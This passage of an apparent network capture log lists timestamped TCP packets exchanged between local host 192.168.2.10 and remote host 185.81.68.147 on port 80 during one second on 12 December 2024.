                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.764718056 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.764825106 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.765666962 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.765959024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.766696930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.766792059 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.767544985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.767740965 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.767749071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.767756939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.767858028 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.768832922 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.769777060 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.769784927 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.769876003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.769910097 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.769932985 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.770778894 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.771308899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.771440029 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.771914005 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.771922112 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.772070885 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.772877932 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.772886992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.773026943 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.773874044 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.773883104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.774059057 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.775083065 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.775093079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.775237083 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.775865078 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.775933027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.776036978 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.776808977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.777134895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.777827978 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.778017998 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.778207064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.778898954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.778935909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.779035091 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.779900074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.918895006 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.918946028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.919348001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.919492006 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.919521093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.920485020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.920586109 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.920691967 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.921552896 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.922724962 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.922732115 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.922820091 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.922945976 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.923466921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.923472881 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.923693895 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.924463987 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.925348043 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.925426960 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.925606012 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.925611973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.925920963 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.926469088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.926565886 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.926595926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.927473068 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.927556038 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.927665949 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.928529024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.928627968 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.929537058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.929543018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.929570913 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.929678917 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.930562973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.930696964 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.931320906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.931550026 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.931691885 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.931924105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.932611942 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.932845116 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.933504105 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.933583021 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.933873892 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.934149027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.934731007 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.934849024 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.934850931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.935669899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.935676098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.935756922 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.936666965 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.936794996 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.936822891 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.937664032 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.937673092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.937755108 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.938664913 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.938796043 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.938890934 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.939702034 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.939804077 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.939917088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.940709114 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.940845966 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.941138029 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.941745996 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.941826105 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.942764997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.942770958 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.942778111 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.942867041 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.943749905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.943840027 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.943953991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.944802999 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.944921970 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.945271015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.945838928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.945844889 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.945930958 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.946832895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.946947098 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.947824001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.947829008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.947840929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.947915077 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.948890924 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.948961973 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.949186087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.949944973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.949950933 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.950030088 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.950905085 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.950970888 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.951503992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.951977015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.952042103 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.952060938 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.953057051 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.953495979 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.953588963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.953991890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.953996897 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.954622030 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.954905033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.955033064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.955394983 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.955921888 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.957007885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.957012892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.957019091 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.957084894 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.957967997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.958350897 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.958934069 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.959019899 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.959986925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.960047007 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.960052013 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.960136890 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.961114883 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.961266041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.961349964 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.962038994 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.962585926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.962716103 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.963002920 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.963304043 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.963422060 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.964047909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.964297056 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.964401960 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.965042114 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.965774059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.965876102 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.966105938 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.966110945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.966217041 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.967088938 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.967690945 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.967834949 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.968151093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.968156099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.968229055 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.969108105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.969537020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.970050097 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.970087051 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.970139980 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.970715046 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.971131086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.971560955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.971673012 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.972094059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.973406076 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.111213923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.111383915 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.111515999 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.111675024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.111823082 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.111910105 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.112699986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.112761974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.113156080 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.113732100 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.113806963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.113959074 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.114708900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.114877939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.114953995 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.115777969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.115931988 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.116043091 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.116827011 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.116833925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.116960049 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.117789030 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.118038893 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.118148088 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.118801117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.118963003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.119101048 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.119788885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.119972944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.120500088 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.120829105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.120959997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.121112108 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.121840954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.122215033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.122673988 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.122857094 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.122976065 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.123054028 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.123879910 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.123975039 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.124053001 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.124919891 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.125564098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.125804901 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.125936031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.125945091 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.126015902 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.126979113 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.128047943 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.128062010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.128177881 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.128331900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.129056931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.129101992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.129163027 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.129184008 CET4994680192.168.2.10185.81.68.147
